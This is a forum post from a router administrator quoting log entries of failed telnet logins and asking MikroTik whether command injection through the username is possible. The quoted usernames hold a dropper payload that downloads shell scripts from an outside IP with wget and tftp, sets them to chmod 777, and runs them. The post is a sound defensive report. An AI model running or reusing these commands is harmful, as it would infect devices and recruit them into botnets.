Hi everyone,
we just saw this in one of our routers’ logs:
system,error,critical login failure for user cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://208.67.1.91/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 208 from 122.52.113.24 via telnet
system,error,critical login failure for user .67.1.91 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 208.67.1.91; chmod 777 tftp2.sh; sh tftp2.sh; rm from 122.52.113.24 via telnet
Looks like someone’s trying to inject malicious code via username. I wouldn’t get excited, but the fact that the beginning of the second message looks truncated hints that the injection could actually work. If it was checked in wrongly quoted bash, well, we’d be seriously fucked up.
Could anyone from Mikrotik please reliably investigate/acknowledge/deny the possibility of this type of code injection? Version is quite recent (6.32.2). If the injection wasn’t be possible, I highly doubt the scriptkids would even care to send such logins…
Thanks in advance,
-mk